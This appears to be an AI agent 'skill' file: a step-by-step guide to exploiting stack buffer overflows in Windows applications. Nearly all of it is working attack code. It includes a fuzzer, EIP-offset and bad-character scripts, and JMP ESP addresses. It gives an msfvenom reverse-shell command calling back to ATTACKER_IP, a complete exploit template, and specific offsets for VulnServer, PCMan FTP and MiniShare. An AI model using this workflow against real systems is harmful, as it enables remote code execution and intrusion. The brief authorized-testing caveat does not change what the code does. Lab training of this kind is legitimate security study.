---
name: Buffer Overflow Exploitation
description: This skill should be used when the user asks to "exploit buffer overflow vulnerabilities", "develop stack-based exploits", "find EIP offset", "identify bad characters", "create shellcode payloads", "perform fuzzing for crashes", or "gain remote code execution via memory corruption". It provides comprehensive techniques for discovering and exploiting buffer overflow vulnerabilities in Windows applications.
version: 1.0.0
tags: [buffer-overflow, exploit-development, shellcode, memory-corruption, fuzzing, windows-exploitation]
---

# Buffer Overflow Exploitation

## Purpose

Execute systematic buffer overflow vulnerability discovery and exploitation against Windows applications to achieve remote code execution. This skill enables comprehensive fuzzing to identify crashes, determination of EIP offset, bad character identification, JMP ESP location discovery, shellcode generation, and final exploit construction for penetration testing and OSCP-style assessments.

## Inputs / Prerequisites

### Required Tools
- Immunity Debugger with Mona.py plugin installed
- Python 2.7 for exploit script development
- Metasploit Framework (msfvenom, pattern_create, pattern_offset)
- Netcat for reverse shell listener
- Target Windows application with known vulnerability

### Environment Setup
- Windows VM with vulnerable application
- Kali Linux or attacker machine
- Network connectivity between machines
- Mona.py copied to `C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands`

### Knowledge Requirements
- Understanding of x86 assembly and memory layout
- Familiarity with stack structure (ESP, EIP, EBP)
- Basic Python socket programming
- Understanding of shellcode encoding

## Outputs / Deliverables

### Primary Outputs
- Working exploit achieving remote code execution
- Reverse shell on target system
- Documented exploitation process
- Exploit template for similar vulnerabilities

### Evidence Artifacts
- Crash offset documentation
- Bad character list
- JMP ESP address with module info
- Complete exploit script

## Core Workflow

### Phase 1: Fuzzing the Application

#### Create Fuzzing Script
Systematically send increasing buffer sizes to identify crash point:

```python
#!/usr/bin/python
import socket
from time import sleep

length = 100

while True:
    try:
        print "Fuzzing with %d bytes" % length
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('TARGET_IP', TARGET_PORT))
        s.recv(1024)
        s.send('COMMAND ' + 'A' * length + '\r\n')
        s.recv(1024)
        s.close()
        sleep(1)
        length += 100
    except:
        print "Crashed at %d bytes" % length
        exit()
```

#### Monitor in Immunity Debugger
1. Attach Immunity Debugger to target process
2. Press F9 to run the application
3. Run fuzzer and note crash byte count
4. Observe EIP value (should show `41414141` for 'AAAA')

### Phase 2: Finding EIP Offset

#### Generate Unique Pattern
Create a non-repeating pattern to identify exact offset:

```bash
# Using Metasploit
msf-pattern_create -l 2100

# Using Mona in Immunity
!mona pattern_create 2100
```

Pattern saved to: `C:\Program Files\Immunity Inc\Immunity Debugger\pattern.txt`

#### Send Pattern to Application

```python
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

pattern = "Aa0Aa1Aa2Aa3..."  # Full pattern from pattern_create

s.recv(1024)
s.send('COMMAND ' + pattern + '\r\n')
s.recv(1024)
s.close()
```

#### Determine Offset
After crash, note EIP value from Immunity Debugger:

```bash
# Using Metasploit
msf-pattern_offset -q 396F4338

# Using Mona
!mona pattern_offset 396F4338
```

Result: Exact position found (e.g., offset 2006)

#### Verify Offset Control

```python
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

offset = 2006
buffer = 'A' * offset + 'B' * 4 + 'C' * 400

s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()
```

Verify EIP shows `42424242` (BBBB) confirming offset control.

### Phase 3: Bad Character Identification

#### Generate Bad Character Array
Create complete byte array for testing:

```bash
!mona bytearray
```

Output saved to: `C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.txt`

#### Standard Bad Character Array

```python
badchars = (
    "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
    "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
    "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
    "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
    "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
    "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
    "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
```

#### Send Bad Characters

```python
#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

offset = 2006
buffer = 'A' * offset + 'B' * 4 + badchars

s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()
```

#### Analyze in Immunity
1. Right-click ESP register → Follow in Dump
2. Examine hex dump for truncated or corrupted sequences
3. Note character before corruption as bad character

#### Automated Bad Character Detection

```bash
# Compare memory with expected bytearray
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a ESP_ADDRESS

# Generate new bytearray excluding known bad chars
!mona bytearray -cpb "\x00\x0a\x0d"
```

#### Common Bad Characters
| Character | Hex | Description |
|-----------|-----|-------------|
| NULL | `\x00` | String terminator |
| LF | `\x0a` | Line feed |
| CR | `\x0d` | Carriage return |
| Space | `\x20` | Whitespace delimiter |

### Phase 4: Finding JMP ESP

#### Search for JMP ESP Instruction
Locate a reliable return address to redirect execution:

```bash
# Find JMP ESP in loaded modules
!mona jmp -r esp

# Search specific module (without ASLR)
!mona find -s "\xff\xe4" -m essfunc.dll

# List modules to find suitable candidates
!mona modules
```

#### Module Selection Criteria
Choose modules with these protections DISABLED:
- ASLR: False
- Rebase: False
- SafeSEH: False
- NXCompat: False

#### Manual JMP ESP Search
Using nasm_shell to get opcode:

```bash
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
```

Search in Immunity: `!mona find -s "\xff\xe4" -m MODULE.dll`

#### Convert Address to Little Endian
Found address: `0x625011AF`
Little endian format: `\xAF\x11\x50\x62`

Using struct.pack:
```python
import struct
jmpesp = struct.pack("<I", 0x625011AF)
```

### Phase 5: Shellcode Generation

#### Generate Reverse Shell Payload

```bash
msfvenom -p windows/shell_reverse_tcp \
    LHOST=ATTACKER_IP \
    LPORT=4444 \
    EXITFUNC=thread \
    -b "\x00\x0a\x0d" \
    -e x86/shikata_ga_nai \
    -f python \
    -v shellcode
```

#### Parameters Explained
| Parameter | Purpose |
|-----------|---------|
| `-p` | Payload type |
| `LHOST` | Attacker IP for callback |
| `LPORT` | Attacker listening port |
| `EXITFUNC=thread` | Clean exit without crashing |
| `-b` | Bad characters to avoid |
| `-e` | Encoder for obfuscation |
| `-f python` | Output format |
| `-v shellcode` | Variable name |

### Phase 6: Final Exploit Construction

#### Complete Exploit Template

```python
#!/usr/bin/python
import socket
import struct
import sys

if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <TARGET_IP>\n"
    sys.exit()

# Configuration
target_ip = sys.argv[1]
target_port = 9999
offset = 2006

# JMP ESP address (little endian)
jmpesp = struct.pack("<I", 0x625011AF)

# NOP sled for decoder space
nops = "\x90" * 20

# Shellcode (msfvenom output)
shellcode = (
    "\xba\xbd\x3a\xaf\xba\xd9\xf7\xd9\x74\x24\xf4"
    "\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12"
    # ... rest of shellcode
)

# Build buffer
buffer = "A" * offset
buffer += jmpesp
buffer += nops
buffer += shellcode

# Send exploit
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    s.recv(1024)
    s.send('TRUN .' + buffer + '\r\n')
    s.recv(1024)
    s.close()
    print "[+] Exploit sent successfully"
except:
    print "[-] Connection failed"
```

#### Execute Exploit

```bash
# Start listener on attacker
nc -lvnp 4444

# Run exploit
python2 exploit.py TARGET_IP

# Receive shell connection
```

## Quick Reference

### Mona Commands Cheatsheet
| Command | Purpose |
|---------|---------|
| `!mona pattern_create LENGTH` | Create unique pattern |
| `!mona pattern_offset EIP` | Find offset position |
| `!mona bytearray` | Generate byte array |
| `!mona bytearray -cpb "\x00"` | Exclude bad chars |
| `!mona compare -f FILE -a ADDR` | Compare memory |
| `!mona jmp -r esp` | Find JMP ESP |
| `!mona modules` | List loaded modules |
| `!mona find -s BYTES -m MODULE` | Search in module |

### Exploitation Workflow Summary
```
1. Fuzz → Find crash point
2. Pattern → Determine EIP offset
3. Verify → Control EIP with known value
4. Badchars → Identify restricted bytes
5. JMP ESP → Find return address
6. Shellcode → Generate payload
7. Exploit → Combine and execute
```

### Buffer Structure
```
[PADDING][EIP][NOP SLED][SHELLCODE]
   |       |      |         |
   A*N   JMP ESP  \x90*20  msfvenom output
```

### Common Offsets Reference
| Application | Command | Offset |
|-------------|---------|--------|
| VulnServer TRUN | TRUN . | 2006 |
| MiniShare 1.4.1 | GET | 1787 |
| PCMan FTP PORT | PORT | 2006 |
| FreeFloat FTP USER | USER | 230 |

## Constraints and Guardrails

### Operational Boundaries
- Test only against authorized systems and applications
- Use isolated lab environments for exploit development
- Document all testing activities and findings
- Avoid testing against production systems

### Technical Limitations
- DEP (Data Execution Prevention) prevents stack execution
- ASLR randomizes module addresses each reboot
- Stack canaries detect buffer overflows
- SafeSEH restricts exception handler exploitation

### Bypass Considerations
- DEP Bypass: ROP chains, ret2libc techniques
- ASLR Bypass: Information leaks, fixed modules
- Canary Bypass: Format string bugs, heap overflow

## Examples

### Example 1: VulnServer TRUN Exploitation

**Fuzzing Result**: Crash at ~2100 bytes
**EIP Offset**: 2006 bytes
**Bad Characters**: `\x00` only
**JMP ESP**: `0x625011AF` (essfunc.dll)

**Exploit**:
```python
buffer = "A" * 2006
buffer += "\xAF\x11\x50\x62"  # JMP ESP
buffer += "\x90" * 20         # NOP sled
buffer += shellcode           # Reverse shell
```

### Example 2: PCMan FTP PORT Command

**Fuzzing Result**: Crash at ~2100 bytes
**EIP Offset**: 2006 bytes
**Bad Characters**: `\x00\x0a\x0d`
**JMP ESP**: `0x75E2798D` (SHELL32.dll)

**Exploit Structure**:
```python
s.send("USER Anonymous\r\n")
s.recv(1024)
s.send("PASS pass\r\n")
s.recv(1024)
s.send("PORT " + buffer + "\r\n")
```

### Example 3: MiniShare 1.4.1 HTTP GET

**Fuzzing Result**: Crash at ~1800 bytes
**EIP Offset**: 1787 bytes
**Bad Characters**: `\x00\x0d`
**JMP ESP**: `0x7E6B30D7` (SHELL32.dll)

**Buffer Format**:
```python
metodo_http = "GET "
buffer = "A" * 1787 + jmpesp + nops + shellcode
cabecera_http = " HTTP/1.1\r\n\r\n"
payload = metodo_http + buffer + cabecera_http
```

## Troubleshooting

### Exploit Crashes Application But No Shell
- Verify shellcode bad characters are excluded
- Increase NOP sled size for decoder space
- Check LHOST/LPORT in shellcode match listener
- Ensure EXITFUNC=thread for stable exit

### EIP Not Overwritten as Expected
- Verify offset calculation is correct
- Check for additional bad characters affecting padding
- Ensure complete pattern reaches EIP position

### JMP ESP Address Causes Crash
- Verify module has ASLR disabled
- Check address doesn't contain bad characters
- Confirm address valid after application restart

### Shellcode Not Executing
- DEP may be enabled - check module protections
- NOP sled too short for decoder
- Bad characters corrupting shellcode
- Try different encoder or manual encoding

### Application Crashes Before Shell
- EXITFUNC incorrect - try `thread`, `process`, or `seh`
- Shellcode size exceeds available buffer space
- Stack alignment issues - add stack adjustment